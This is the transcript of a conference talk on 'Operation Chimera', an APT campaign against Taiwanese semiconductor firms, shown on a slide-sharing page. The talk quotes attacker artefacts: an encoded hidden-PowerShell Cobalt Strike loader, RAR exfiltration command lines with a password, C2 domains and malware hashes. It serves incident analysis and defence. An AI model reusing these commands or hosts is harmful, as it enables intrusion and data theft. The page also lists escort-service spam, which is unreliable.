[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 

Último

Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptxChiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
raffaeleoman
 
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
Sheetaleventcompany
 

Último (20)

Introduction to Prompt Engineering (Focusing on ChatGPT)
Introduction to Prompt Engineering (Focusing on ChatGPT)Introduction to Prompt Engineering (Focusing on ChatGPT)
Introduction to Prompt Engineering (Focusing on ChatGPT)
 
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
 
lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.
 
ICT role in 21st century education and it's challenges.pdf
ICT role in 21st century education and it's challenges.pdfICT role in 21st century education and it's challenges.pdf
ICT role in 21st century education and it's challenges.pdf
 
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort ServiceBDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
 
ANCHORING SCRIPT FOR A CULTURAL EVENT.docx
ANCHORING SCRIPT FOR A CULTURAL EVENT.docxANCHORING SCRIPT FOR A CULTURAL EVENT.docx
ANCHORING SCRIPT FOR A CULTURAL EVENT.docx
 
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptxChiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
 
Causes of poverty in France presentation.pptx
Causes of poverty in France presentation.pptxCauses of poverty in France presentation.pptx
Causes of poverty in France presentation.pptx
 
Dreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video TreatmentDreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video Treatment
 
BDSM⚡Call Girls in Sector 97 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 97 Noida Escorts >༒8448380779 Escort ServiceBDSM⚡Call Girls in Sector 97 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 97 Noida Escorts >༒8448380779 Escort Service
 
Air breathing and respiratory adaptations in diver animals
Air breathing and respiratory adaptations in diver animalsAir breathing and respiratory adaptations in diver animals
Air breathing and respiratory adaptations in diver animals
 
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
 
VVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara Services
VVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara ServicesVVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara Services
VVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara Services
 
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfAWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
 
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
 
Dreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio IIIDreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio III
 
Report Writing Webinar Training
Report Writing Webinar TrainingReport Writing Webinar Training
Report Writing Webinar Training
 
SaaStr Workshop Wednesday w/ Lucas Price, Yardstick
SaaStr Workshop Wednesday w/ Lucas Price, YardstickSaaStr Workshop Wednesday w/ Lucas Price, Yardstick
SaaStr Workshop Wednesday w/ Lucas Price, Yardstick
 
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdfThe workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
 
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptx
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptxMohammad_Alnahdi_Oral_Presentation_Assignment.pptx
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptx
 

[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK Chen, Inndy Lin, Shan-De Jiang

  • 1. CyCraft Proprietary and Confidential Information Operation Chimera - APT Operation Targets Semiconductor Vendors C h u n g - K u a n C h e n , I n n d y L i n , S h a n g - D e J i a n g
  • 2. CyCraft Proprietary and Confidential Information Whoami C.K Chen ► Senior Researcher at CyCraft ► Retired CTF Player – BambooFox Founder ► HITCON/HITB Review Board ► CHROOT member SHANG-DE Jiang ► Security Researcher at CyCraft ► UCCU Hacker Co-Founder Inndy Lin ► Security Researcher at CyCraft ► Reverse Engineering Hobbyist ► Presented in HITCON, ROOTCON
  • 3. CyCraft CyCraft is an AI company that forges the future of cybersecurity resilience through autonomous systems and human-AI collaboration.
  • 4. CyCraft in MITRE ATT&CK Evaluation CyCraft Takes Significant Alerting Lead in MITRE ATT&CK® Evaluations’ Latest Round
  • 5. Outline • Introduction • Case Study • A Company • B Company • C Company • Threat Actor's Digital Arsenal • Conclusion
  • 6. CyCraft Proprietary and Confidential Information Critical Incidents in Taiwan's Supply Chain/Critical Infrastructure ASUS Supply Chain AttackTSMC Ransomware ColdLock against CPC
  • 7. CyCraft Proprietary and Confidential Information Taiwan's Importance in the Semiconductor Landscape ►With decades of development, Taiwan has established itself as a leading player in the semiconductor industry. Some of the well-known leaders include TSMC and MTK • “Taiwan is set to become the largest and fastest-growing semiconductor equipment maker in the world by increasing by 21.1 percent to reach US$12.31 billion.” -Taiwan News, July 2019
  • 8. Cyberattack to semiconductor vendors v Just like the TSMC ransomware, a cyberattack against semiconductor could potentially v Seriously impact Taiwan’s economy v Affect the entire global supply chain v In this report, we will show how IT attacks on semiconductor vendors can be just as dangerous as an OT attack. v Attack to OT - production line halt, immediately damage v Attack to IT - leak important intelligence property, long-term damage
  • 9. Large-scale APT attacks on Semiconductor Industry Between 2018 and 2019, we discovered several attacks on semiconductor vendors Vendors located at the Hsinchu Science Park(HSP) were targeted After our white paper was published, the received feedback revealed that more than 8 vendors were targeted by the same threat actor (New victim found after our sharing in BH) Extensive attack: > 8 semiconductor vendors were attacked The APT on the important vendors were precise and well-coordinated. Their subsidiaries, and competitors were all targeted Not a single point attack, but an attack on the entire industry surface
  • 10. CyCraft Proprietary and Confidential Information Group Chimera ►As the activities, attack techniques, and tactics were similar, we believe this was the work of the same threat actor ►Target: Semiconductor Vendors ►Malware: Merged different Open Source Tools (Dumpert and Mimikatz , CobaltStrike) ►C2: C2 hosted in Public Cloud (Google App Engine, Azure) ►Goal: Steal Documents, Source code, SDK of chip related projects
  • 11. Investigation Overview Investigation Period: 2018~2019 Investigated Vendors: 3+ Total Endpoints Analyzed: 30k
  • 12. Today's Case Study Ø The three vendors involved in the analysis currently have a leading global position in their own market segments Ø Due to the different investigation time points, the analytical perspective of the attack campaign was different A Company • Our long-term partner. The long- term monitoring allowed more details of the attacker's activities to be revealed. • The detailed information enabled us to track the root cause. B Company • One-time IR service. When the investigation started, it was already a long time after the attacks happened. • Highlighted the threat actor’s long-term activities and what data was leaked. C Company • Long-term partner with high security capacity. • Help us to deep investigate, get a lot feedback from them • Give us more information to illustrate threat actors
  • 13. Non-representative. Only for illustration purposes In the following slides, every machine and username are de-identified, not original names
  • 15. Case A: Overview Ø Activity date: 2019/12/09 ~ 2019/12/10 Ø 15 endpoints and 6 user accounts were compromised Ø Note that all the names are de-identified Ø Four malwares and eight C2 servers were found
  • 16. Cobalt Strike Ø Disguised Cobalt Strike beacon as Google Update.exe Ø VT search found nothing Ø Injected payloads into other processes Ø Found in two endpoints: Server-LAUREN & PC-SHENNA
  • 17. Used Hosting Server for C2 Ø Network security devices had difficulty detecting the associated C2 servers, as they were in the Google Cloud Platform. • Created backdoor which was disguised as Google Update. • Other cloud hosting services were also abused
  • 18. Root Cause Analysis - PC-SHENNA Ø With our Timeline Analysis, we found that the backdoor in PC-SHENNA was implanted from Server-LAUREN Server- LAUREN PC- SHENNA Attack was launched right before employees began to get off work
  • 19. Remote Execution Tools schtasks Ø The first Cobalt Strike backdoor was located at NB-CLAIR, and was then remotely copied to Server-LAUREN Ø A valid account was used to invoke Cobalt Strike via schtasks WMIC Ø Server-LAUREN used wmic to remotely execute various commands in another endpoint to check if there was an Internet connection Applied benign program to achieve their malicious activities
  • 20. Root Cause Analysis - Server-LAUREN Ø Due to our new findings, additional information could be added to our investigation graph Server- MELINA Server- SHANAE Server- LAUREN PC-SHENNA
  • 21. Root Cause Analysis - Server-LAUREN Ø Server-LAUREN remotely used an archive tool to collect registry and ntds.dit in Server-MELINA(DC) for offline breaking
  • 22. NTDS.DIT Explanation Ø Active Directory data was stored in the ntds.dit ESE database file. Two copies of ntds.dit were present in separate locations on a given domain controller. • %SystemRoot%NTDSntds.dit • %SystemRoot%System32ntds.dit ntds.dit is the AD database, containing domain hosts and users information(e.g. ID, name, email and password). As ntds.dit was encrypted, and the key was stored I the SYSTEM registry, the adversary also needed to make a copy of the registry data.
  • 23. Root Cause Analysis - NB-CLAIR Ø Through correlation analysis, our AI investigation showed that NB-CLAIR used Schedule Task to place malware to the schedule tasks of Server-LAUREN Server- MELINA Server- SHANAE Server- LAUREN PC- SHENNA schtasks wmic schtasks NB-CLAIR schtasks
  • 24. Root Cause Analysis - NB-CLAIR Ø In the NB-CLAIR timeline, we discovered six minutes before the scheduled task execution, IP1 used RDP and User-01 to make a successful login • This is highly likely to be the root cause of the attack Nightshift? Overtime?
  • 25. Recon Ø Several "net user" commands were executed for recon purposes, and the results were saved to the RecordedTV_lib.log
  • 26. Data Exfiltration Ø RECORDEDTV.MS was used to archive the stolen data for data exfiltration • Identical binaries were found in several machines, but under different names, e.g. RECORDEDTV.MS, uncheck.dmp, and jucheck.exe • RAR software, had a one-byte discrepancy from the original version Ø The same file was also found on other machines. Thus, it is likely to have been used in past attacks Ø Inserting malware in a location, where legal software is stored, seems to be a characteristic tactic of Operation Chimera
  • 27. Root Cause Analysis– IP1 Ø IP1 is a unscanned host and related to many accounts. It could be a shared machine or a VPN host Ø VPN can also be compromised. Never use VPN as your only line of defense
  • 29. • Investigation Reason • Statistic Summary B Company : Overview B company compromise B has business cooperation with C company B&C create a bridge between their networks C discovers anomaly activities from B Asks us to investigate Time Period # of Event # of compromised endpoints # of data leaks # of malware 2018/8/7 ~ 2019/12/11 140k+ 14 9 10
  • 30. Powershell Ø Fileless • 10 endpoints, which included two domain controllers Ø The powershell script executed a Cobalt Strike backdoor and was used for process migration to other system processes svchost.exe powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwB uAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAE EAQQBBAEEAQQBLAFYAVwBiAFcALwBpAE8AQgBEACsAMwBQAHcASwBYADQAVgAwAG8ASgBaADMAdABnAHQAZABWAFYAb wBuAFEAQQBrAGwAbABKAGMAVwAyAGsAWABWAHkAUwBRAG0AdQBEAGcASgBkAFoAeQBtAGQATABmAC8ALwBTAFkAdgA1 AEoAYgAyAGIAawArADYAaQB4AFEAbABuAHMAdwA4AE0AOAA5ADQAUABKAE0AcABsAGMAVwBwAEYATQB5AFUAaABtAGQ AUgBWAEoAeABSADQAVABQ
  • 31. APT Attack Ø Cobalt Strike was used to inject the malware into the system, enabling the attacker to access the system and communicate with a C2 • C2: striking-pipe-253603.appspot.com, msplatform-updates.azureedge.net, chrome- applatses.appspot.com
  • 32. Cyber Situation Graph Ø Company already seriously hacked Ø Difficult to manually investigate, needed help from A.I.
  • 33. ❖2018.11 ❖2019.03 ❖2019.06 ❖2019.09 Hacker returns on a quarterly basis to collect new data.
  • 34. ❖2019.11, Deploy new weapon SkeletonKey Injector ❖2019.12, Harvest new endpoints
  • 35. Archive Password Ø The actor also used a RAR program with innocuous file names, such as RecordedTV.ms, jucheck.exe and vmware.log to archive and steal the data of interest Ø A similar scheme was utilized by the attacker to archive the passwords they used c:usersxxxxlibrariesRecordedTV.ms a -m5 - v71m –hpf**kyou.google.com11 vmlum-vss.log vmlum-vmvss.log C:Windowssystem32cmd.exe /C c:usersxxxxxxlibrariesRecordedTV.ms a -m5 -r –hpf**kyou.google.com11 vmlum-vmopt.log “<Hostname>personal<Username><Product>- Traning-v1.1.pptx" > vmlumss.log & dir vmlum- vmopt*
  • 36. Leaked File Name Ø During our investigation, we made an inventory of the leaked data. Some of the data is shown below: Ø Attacker's intent was stealing intelligence property Ø Business spy? State-sponsor attack to benefit a certain industry? Users<Account>ProjectRoadmap Users<Account>BackupWorkspace Users<Account>chip and SDK setting Users<Account><Productname> SDK Installation guide.pdf
  • 38. Utilize Cloud Storage Ø Exfiltration Tool: 3 in 1 Cloud-Storage Tool (GDrive, Dropbox, OneDrive) Ø MD5: ØV1: be16e6cf8cc63415a1c77a59fa43deba (no record in VT) ØV2: 4d5440282b69453f4eb6232a1689dd4a (onedrive.exe) Ø Use Cloud-based Storage Web API to transfer file -> able to bypass L7 firewall Ø Exfiltration Tool: another Cloud-Storage Tool (Openload Free Space) Ø C# Program
  • 39. 3 in 1 Cloud-based Storage Transfer Tool Storage Type auth Token Uploaded File Path
  • 40. Profile of the Campaign Ø Language - Simplified Chinese
  • 41. Profile of the Campaign v Language - Simplified Chinese Chimera Campaign has at least one member understanding Chinese
  • 42. Profile of the Campaign v Hacker Active Timeline(2019) v Working hours v 8:30 - 12:30 to 13:30 – 20:30 (UTC +8) v Working days v Mon. ~ Fri. ß Normal Time v Wed. ß most busy v Sat. ß Event Driven overtime The campapaign is at the same timezone to TW (UTC+8)
  • 44. CyCraft Proprietary and Confidential Information Actors' Digital Arsenal ►Cobalt Strike Beacon ►WinRAR ►SkeletonKey Injector ►Winnti Backdoor ►CCleaner Attack Stage2 Backdoor
  • 46. CyCraft Proprietary and Confidential Information Cobalt Strike Beacon ►Cobalt Strike Beacon was used as main backdoor ►Overwrite GoogleUpdate.exe for persistency ►Identical file was discovered in 3+ companies ►C2 ► chrome-applatnohp.appspot.com ► ussdns04.heketwe.com ► ussdns02.heketwe.com ► ussdns01.heketwe.com
  • 47. CyCraft Proprietary and Confidential Information Suspicious R-W-X Memory ►Our product detected shellcode in memory
  • 48. CyCraft Proprietary and Confidential Information Hybrid Payload: PE as Shellcode ►"MZ" signature can be decoded as "pop r10" under x64 architecture ►"dec ebp; pop edx" under x86 architecture ►At offset 0x1791c is a shellcode-like function called "reflective loader" ►0x56A2B5F0 is the hash value of "ExitProcess" Locate address of itself, and use it as first argument (rdi) Compuate address of reflective loader and execute it
  • 49. CyCraft Proprietary and Confidential Information Malicious Process Injection Strategy: Named Pipe CobaltStrike Beacon Module Target Process Stager Shellcode Real Payload Execute Spawn Inject Execute Named Pipe
  • 51. CyCraft Proprietary and Confidential Information WinRAR ►They use rar.exe to compress and encrypt the files to be stole ►There's a folder named "RecordedTV.library-ms" under same path
  • 52. CyCraft Proprietary and Confidential Information Mutated rar.exe ►The file was uploaded to VirusTotal in 2009 ►It's rar.exe from WinRAR 3.60b8 but different from original one ►Only 1byte was different, but we've confirmed that was not a crack ►This patch may cause the program crash ►Hypothesis 1: Change file hash to avoid detection ►Hypothesis 2: Bit flip during copy Patch diff (before / after) Disassembly of patch
  • 54. CyCraft Proprietary and Confidential Information SkeletonKey Injector ►A new malware combined "dumpert" and "mimikatz" ►"mimikatz" is a well-known hacking tool ►"dumpert" is a tool to dump lsass.exe memory stealthily
  • 55. CyCraft Proprietary and Confidential Information Dumpert ►Made by a security company called Outflank ►Dump lsass.exe stealthy via direct system call ►Difficulty of direct system call on Windows ►Windows system call numbers changed from release to release ►DLL export function is the only stable interface ►That's why Windows shellcode always needs to locate DLLs in memory
  • 56. CyCraft Proprietary and Confidential Information Dumpert: Implementation ►Use ntdll!RtlGetVerion to determine Windows version ►Load different embedded syscall functions depend on Windows version ►Bypass any userspace hook
  • 57. CyCraft Proprietary and Confidential Information SkeletonKey ►APT malware discovered by DELL Secureworks in 2015 ►Implants a backdoor password to domain controller ►The original password was still valid, wrong password still got rejected ►Inject code into lsass.exe process to alter authentication routine
  • 58. CyCraft Proprietary and Confidential Information Impact of SkeletonKey Injector ►No need to use administrator credentials for lateral movement ►It leaves nearly no clue, only logon success events ►You must reboot domain controller to clean the SkeletonKey ►We've observed some other attack that using modified mimikatz in Taiwan
  • 60. CyCraft Proprietary and Confidential Information Strange Network Tool: baseClient.exe ►We thought that was a network probing tool
  • 61. CyCraft Proprietary and Confidential Information Winnti Backdoor ►We said baseClient.exe was a network probing tool in our public report ►It's actually Winnti backdoor
  • 63. CyCraft Proprietary and Confidential Information CCleaner Supply Chain Attack Injected Malware Implant second stage backdoor to the chosen victim Trojanized DLL Malicious Code Second Stage MalwareFirst Stage Malware We found a variant of 2nd stage malware in the last investigation
  • 64. CyCraft Proprietary and Confidential Information Backdoor Used in CCleaner Attack ►After BlackHat presentation, we discovered a new victim of Chimera Group ►We found a variant of malware used in CCleaner Attack ►filename: wlbsctrl.dll ►md5: 6376a3469c9fb1bb8326e7af734e01d1 ►filename: wlbsctrl.dll.mui ►md5: ( we will release more information soon, follow @cycraft_corp )
  • 65. CyCraft Proprietary and Confidential Information Backdoor Execution Flow Re-assemble wlbsctrl.dll (VMicApi.dll) Shellcode Collector Modified C Runtime Execute Shellcode pieces spread in the DLL wlbsctrl.dll.mui Read and execute shellcode from $DLLNAME.mui Obfuscated, Compressed ShellcodeEmbedded PE Filelessly Execute Include
  • 66. CyCraft Proprietary and Confidential Information Comparison of the Malware This Malware CCleaner Malware Trojanize Patch Modify __security_init_cookie Patch call to GetSystemTimeAsFileTime Patch function tail Overwrite init function pointer ( which will be executed before DllMain/main ) Read payload from $DLLPATH.mui Read payload from registry Shellcode Decode, decompress and sRDI-liked PE loader Obtain C&C IP Hardcoded C2 IP, DWORD in Registry, GitHub GitHub, WordPress, DNS Query Capability Fileless PE execution, Replace file, WinExec Fileless PE execution
  • 67. Other APT Events in Taiwan
  • 68. CyCraft Proprietary and Confidential Information ColdLock Ransomware ►Taiwan's national gasoline company was hit by ransomware ►ColdLock was based on an open-source ransomware: EDA2 ►Ministry of Justice Investigation Bureau said the attack was related to Winnti group
  • 69. CyCraft Proprietary and Confidential Information SkeletonKey Attack in Taiwan ►Serval attacks against Taiwan government agencies used mimikatz and SkeletonKey ►They use modified version of mimikatz and executed file-lessly When OpenProcess failed, it will load mimikatz driver to unprotect lsass.exe and try again.
  • 70. CyCraft Proprietary and Confidential Information Take Away ►Disclosure a large-scale APT attacks targeting semiconductor; more than 7 vendors are compromised. ►Precisely attacks. Targets leading semiconductor vendors, their subsidiaries, partners and competitors. ►Their goals is stealing intelligence property(documents, source code, SDK of chip related projects). Make long-term damage to the victim.
  • 71. CyCraft Proprietary and Confidential Information Take Away ►Attackers utilize varies open source, general tools to make attribution harder. ►In 2 shared case studies, AD & VPN are compromised. Enterprises should consider resilience of IT systems. Avoid relying on a single security service. ►A rarely used SkeletonKey technique is used, which makes adversaries login like normal user. - Persistence, Defense Evasion. ►No system is safe. Regularly threat hunting, shorten the MTTD/MTTR.
  • 72. Thanks for your listening!